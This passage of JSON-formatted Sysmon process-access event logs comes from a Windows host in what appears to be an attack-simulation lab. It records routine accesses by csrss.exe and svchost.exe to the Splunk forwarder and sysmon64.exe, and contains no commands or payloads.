{41C8662E-1FEF-5F25-0000-00106D380500}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","TargetProcessId":"2584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 